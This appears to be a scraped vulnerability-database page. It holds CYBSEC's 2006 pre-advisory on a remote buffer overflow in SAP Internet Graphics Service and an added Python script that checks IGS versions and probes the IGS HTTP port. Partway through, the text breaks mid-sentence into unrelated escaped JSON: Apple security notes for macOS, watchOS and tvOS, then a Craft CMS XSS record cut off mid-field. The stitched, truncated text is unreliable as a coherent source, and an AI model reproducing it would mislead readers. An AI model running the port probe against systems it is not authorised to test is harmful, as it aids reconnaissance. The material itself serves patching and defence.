CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Remote Buffer Overflow
2006-08-11T00:00:00
ID: SECURITYVULNS:DOC:13869 | Type: securityvulns | Reporter: Securityvulns | Modified: 2006-08-11T00:00:00
Description
(The following advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Buffer_Overflow.pdf )
CYBSEC S.A.
www.cybsec.com
Pre-Advisory Name: SAP Internet Graphics Service (IGS) Remote Buffer Overflow
Vulnerability Class: Buffer Overflow
Release Date: 08/10/2006
Affected Applications:
* SAP IGS 6.40 Patchlevel <= 15
* SAP IGS 7.00 Patchlevel <= 3
Affected Platforms:
* AIX 64 bits
* HP-UX on IA64 64bit
* HP-UX on PA-RISC 64bit
* Linux on IA32 32bit
* Linux on IA64 64bit
* Linux on Power 64bit
* Linux on x86_64 64bit
* Linux on zSeries 64bit
* OS/400 V5R2M0
* Solaris on SPARC 64bit
* TRU64 64bit
* Windows Server on IA32 32bit
* Windows Server on IA64 64bit
* Windows Server on x64 64bit
Local / Remote: Remote
Severity: High
Author: Mariano Nuñez Di Croce
Vendor Status:
* Confirmed, update released.
Reference to Vulnerability Disclosure Policy:
http://www.cybsec.com/vulnerability_policy.pdf
Product Overview:
"The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output."
It is important to note that IGS is installed and activated by default with the SAP Web Application Server (versions >= 6.30), so every system on those releases should be assumed to run it unless it has been explicitly disabled.
Vulnerability Description:
A specially crafted HTTP request can trigger a remote buffer overflow in the SAP IGS service. The advisory does not describe the malformed request; see Technical Details below.
Technical Details:
Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow its customers to upgrade affected software before the technical details become publicly available.
Impact:
Under UNIX systems, successful exploitation of this vulnerability may allow an attacker to execute remote code with the privileges of the SAP System Administrator account (<SID>adm), allowing them to take full control of the SAP system installation.
Under Microsoft Windows systems, successful exploitation of this vulnerability may allow an attacker to execute remote code with the privileges of the LocalSystem account, allowing them to take full control of the entire system.
Solutions:
SAP has released patches to address this vulnerability. Affected customers should apply the patches immediately.
More information can be found on SAP Note 968423.
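The following is an added example, not code from CYBSEC's advisory or from SAP: a small triage script that turns the Affected Applications table and the Solutions section above into something that can be run against an SAP landscape. It derives the IGS TCP ports for an instance number, parses a version/patch-level string, decides whether it falls inside the affected ranges (6.40 Patchlevel <= 15, 7.00 Patchlevel <= 3), and can optionally send a plain GET to the IGS HTTP port to collect a banner. Two things are assumptions rather than facts from the advisory: the default IGS port scheme (4NN00 for the multiplexer, 4NN80 for HTTP, taken from SAP's IGS documentation) and the banner formats the regular expression accepts, since the advisory never says how IGS reports its version. The hostname in the example is constructed.

```python
"""Added exposure check for the IGS advisory above; not CYBSEC's or SAP's code.

  1. igs_ports():      derive the IGS TCP ports for an SAP instance number
  2. parse_version():  pull "version / patch level" out of an IGS banner
  3. is_affected():    compare against the advisory's affected ranges
  4. probe_igs_http(): optional live GET against the IGS HTTP port
"""
import http.client
import re
from typing import Optional, Tuple

# Affected ranges exactly as the advisory lists them: (major, minor) -> highest
# affected patch level. Higher patch levels carry the fix from SAP Note 968423.
AFFECTED_MAX_PATCHLEVEL = {
    (6, 40): 15,
    (7, 0): 3,
}

Version = Tuple[int, int, int]  # (major, minor, patchlevel)


def igs_ports(instance_number: int) -> Tuple[int, int]:
    """Return (multiplexer_port, http_port) for SAP instance number 00-99.

    ASSUMPTION: SAP's default IGS port scheme, 4NN00 for the multiplexer and
    4NN80 for HTTP. The advisory does not state ports; verify in your landscape.
    """
    if not 0 <= instance_number <= 99:
        raise ValueError("SAP instance numbers are two digits (00-99)")
    base = 40000 + instance_number * 100
    return base, base + 80


def parse_version(text: str) -> Optional[Version]:
    """Parse '6.40 Patchlevel 15', '7.00 PL 3' or '7.00.4' into a Version.

    ASSUMPTION: these banner shapes are guesses; the advisory does not say
    how IGS reports its version. Returns None when nothing matches.
    """
    m = re.search(r"(\d+)\.(\d+)\D*?(?:patch\s*level|pl|\.)\s*(\d+)",
                  text, re.IGNORECASE)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def is_affected(version: Version) -> bool:
    """True when version lies inside an affected range from the advisory.

    Releases the advisory does not list (e.g. 6.20, 7.10) return False: no
    claim is made about them here, so assess them separately.
    """
    major, minor, patchlevel = version
    limit = AFFECTED_MAX_PATCHLEVEL.get((major, minor))
    return limit is not None and patchlevel <= limit


def probe_igs_http(host: str, port: int, timeout: float = 3.0) -> Optional[str]:
    """GET / from the IGS HTTP port; None if closed or unresponsive.

    Only a plain GET is sent. Nothing here tries to trigger the overflow;
    the advisory withholds the shape of the malformed request anyway.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/")
        return conn.getresponse().read().decode("latin-1", errors="replace")
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()


def assess(host: str, instance_number: int, banner: Optional[str] = None) -> dict:
    """Tie the pieces together. Pass `banner` (a response body captured by a
    scanner) to stay offline; leave it None to probe 4NN80 live."""
    mux_port, http_port = igs_ports(instance_number)
    if banner is None:
        banner = probe_igs_http(host, http_port)
    version = parse_version(banner) if banner else None
    return {
        "host": host,
        "igs_mux_port": mux_port,
        "igs_http_port": http_port,
        "reachable": banner is not None,
        "version": version,
        "affected": is_affected(version) if version else None,
    }


if __name__ == "__main__":
    # Constructed banner standing in for a live IGS response.
    print(assess("sap-app01.example.internal", 0,
                 banner="SAP Internet Graphics Server 6.40 Patchlevel 15"))
```

Because IGS is activated by default with the Web Application Server, the useful output of this script is the list of hosts where `reachable` is true and `affected` is true: those are instances that answer on the IGS HTTP port from wherever the scan ran and still carry a patch level below the fix. A version the advisory does not list comes back as not affected, which means "not covered by this advisory", not "safe".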
Vendor Response:
* 06/02/2006: Initial Vendor Contact.
* 06/09/2006: Vendor Confirmed Vulnerability.
* 07/03/2006: Vendor Releases Update for version 6.40.
* 07/13/2006: Vendor Releases Update for version 7.00.
* 08/10/2006: Pre-Advisory Public Disclosure.
Special Thanks:
Thanks go to Carlos Diaz and Victor Montero.
Contact Information:
For more information regarding the vulnerability, feel free to contact the author at mnunez {at} cybsec.com. Please bear in mind that technical details will be disclosed to the general public three months after the release of this pre-advisory.
For more information regarding CYBSEC: www.cybsec.com
(c) 2006 - CYBSEC S.A. Security Systems
Vulners record: https://vulners.com/securityvulns/SECURITYVULNS:DOC:13869 (the record lists no CVE identifier and no CVSS vector for this advisory).
This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel 
Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input 
sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. 
This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. 
This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n", "edition": 3, "modified": "2020-07-27T08:21:38", "published": "2020-07-27T08:21:38", "id": "APPLE:HT208331", "href": "https://support.apple.com/kb/HT208331", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:27", "bulletinFamily": "software", "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13862"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added 
December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be 
able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. 
This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n", "edition": 2, "modified": "2018-10-18T06:10:21", "published": "2018-10-18T06:10:21", "id": "APPLE:HT208325", "href": "https://support.apple.com/kb/HT208325", "title": "About the security content of watchOS 4.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:22", 
"bulletinFamily": "software", "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th 
generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with 
improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory 
handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th 
generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. 
This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n", "edition": 2, "modified": "2018-10-18T05:56:48", "published": "2018-10-18T05:56:48", "id": "APPLE:HT208327", "href": "https://support.apple.com/kb/HT208327", "title": "About the security content of tvOS 11.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T07:36:58", "description": "An issue was discovered in the Comments plugin before 1.5.6 for Craft CMS. There is stored XSS via a guest name.", "edition": 7, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-06-05T19:15:00", "title": "CVE-2020-13869", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": 